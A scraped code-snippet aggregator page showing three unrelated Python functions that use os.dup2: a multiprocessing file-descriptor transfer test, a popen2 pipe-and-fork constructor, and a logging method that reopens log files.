def test_large_fd_transfer(self):
        # With fd > 256 (issue #11657)
        # Sends a descriptor numbered 256 or above to a child process and
        # checks that the child could write through it.
        if self.TYPE != 'processes':
            self.skipTest("only makes sense with processes")
        conn, child_conn = self.Pipe(duplex=True)

        writer = self.Process(target=self._writefd,
                              args=(child_conn, b"bar", True))
        writer.daemon = True
        writer.start()
        with open(test_support.TESTFN, "wb") as out:
            source_fd = out.fileno()
            # First descriptor number >= 256 that is not currently in use.
            high_fd = next(
                (candidate for candidate in range(256, MAXFD)
                 if not self._is_fd_assigned(candidate)),
                None)
            if high_fd is None:
                self.fail("could not find an unassigned large file descriptor")
            os.dup2(source_fd, high_fd)
            try:
                reduction.send_handle(conn, high_fd, writer.pid)
            finally:
                os.close(high_fd)
        writer.join()
        with open(test_support.TESTFN, "rb") as written:
            self.assertEqual(written.read(), b"bar")
popen2.py 文件源码 项目:python2-tracer 作者: extremecoders-re 项目源码 文件源码 阅读 27 收藏 0 点赞 0 评论 0
def __init__(self, cmd, bufsize=-1):
        """Fork a child for *cmd*, wired to this object through two pipes.

        One pipe feeds the child's stdin; the other carries the child's
        stdout and stderr together.  The parent ends are exposed as
        ``self.tochild`` (writable) and ``self.fromchild`` (readable), both
        opened with *bufsize*.  The child's pid is stored in ``self.pid``.
        """
        _cleanup()
        self.cmd = cmd
        child_stdin, parent_write = os.pipe()
        parent_read, child_output = os.pipe()
        self.pid = os.fork()
        if self.pid == 0:
            # Child: install the pipe ends as fds 0, 1 and 2 (stdout and
            # stderr share one pipe), then hand over to _run_child.
            # NOTE(review): _run_child is presumably expected never to
            # return; otherwise the child would fall into the parent code.
            wiring = ((child_stdin, 0), (child_output, 1), (child_output, 2))
            for pipe_end, std_fd in wiring:
                os.dup2(pipe_end, std_fd)
            self._run_child(cmd)
        # Parent: drop the ends that belong to the child and wrap our own.
        os.close(child_stdin)
        self.tochild = os.fdopen(parent_write, 'w', bufsize)
        os.close(child_output)
        self.fromchild = os.fdopen(parent_read, 'r', bufsize)
glogging.py 文件源码 项目:tabmaster 作者: NicolasMinghetti 项目源码 文件源码 阅读 29 收藏 0 点赞 0 评论 0
def reopen_files(self):
        """Reopen the error log and every ``FileHandler`` stream.

        When output capture is enabled and the error log is not ``"-"``,
        stdout and stderr are flushed, the log file is reopened in append
        mode under ``self.lock`` and its descriptor is duplicated onto the
        stdout and stderr descriptors.  Afterwards each open
        ``logging.FileHandler`` stream of the loggers returned by
        ``loggers()`` is closed and reopened.
        """
        capturing = self.cfg.capture_output and self.cfg.errorlog != "-"
        if capturing:
            for std_stream in (sys.stdout, sys.stderr):
                std_stream.flush()

            with self.lock:
                if self.logfile is not None:
                    self.logfile.close()
                self.logfile = open(self.cfg.errorlog, 'a+')
                for std_stream in (sys.stdout, sys.stderr):
                    os.dup2(self.logfile.fileno(), std_stream.fileno())

        for logger in loggers():
            for handler in logger.handlers:
                if not isinstance(handler, logging.FileHandler):
                    continue
                # Hold the handler's own lock while swapping its stream.
                handler.acquire()
                try:
                    if handler.stream:
                        handler.stream.close()
                        handler.stream = open(handler.baseFilename,
                                              handler.mode)
                finally:
                    handler.release()


问题


面经


文章

微信
公众号

扫码关注公众号